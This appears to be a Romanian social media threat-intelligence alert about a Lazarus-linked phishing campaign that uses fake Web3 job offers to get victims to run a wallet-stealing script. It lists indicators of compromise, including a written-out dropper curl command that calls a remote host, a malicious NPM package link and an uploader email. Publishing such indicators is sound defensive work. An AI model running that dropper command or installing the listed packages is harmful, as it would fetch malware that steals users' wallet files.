🚨 Alertă Securitate TI 🚨

Conform partenerului din comunitate @1nf0s3cpt, o campanie activă de phishing vizează utilizatorii Web3 cu oferte false de muncă (de exemplu, 120 USD/oră) pentru a-i înșela să execute un script malicious care fură fișierele portofelului.

🔍 IOCs principale:

🔸Repo GitLab: https://t.co/ivGN93PS4b

🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 Metoda atacului este foarte similară cu utilizarea anterioară de către Lazarus a pachetelor NPM pentru răspândirea codului malicious:

https://t.co/bBC4i2vYpA

🚨 Am descoperit că un nou pachet NPM malicious a fost publicat recent:

https://t.co/SjgmO1FOIL

🔸GitHub probabil legat: apollo-hero

🔸Adresa de email a încărcătorului: skelstar125@gmail.com

⚠️ NU INSTALAȚI sau NU RULAȚI pachete sau scripturi necunoscute. Verificați întotdeauna sursele.

#LAZARUS #Phishing